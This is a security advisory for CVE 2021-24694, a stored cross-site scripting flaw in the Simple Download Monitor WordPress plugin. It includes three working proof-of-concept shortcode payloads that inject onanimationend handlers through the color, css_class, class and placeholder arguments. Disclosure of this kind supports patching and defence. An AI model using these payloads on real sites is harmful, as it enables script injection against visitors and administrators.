Simple Download Monitor < 3.9.11 – Contributor+ Stored Cross-Site Scripting via Shortcodes | CVE 2021-24694

Description

The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1) "color" or "css_class" argument of sdm_download shortcode, 2) "class" or "placeholder" argument of sdm_search_form shortcode.

Proof of Concept

// all spaces must be replaced with a slash
[sdm_download id="replace-with-real-download-post-id" color='"/style="animation-name:twentytwentyone-close-button-transition"/onanimationend="alert(origin)']

// fancy=2 or 3 also works
[sdm_download id="599" fancy="1" css_class='"style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)']

[sdm_search_form class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)' placeholder='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin+2)']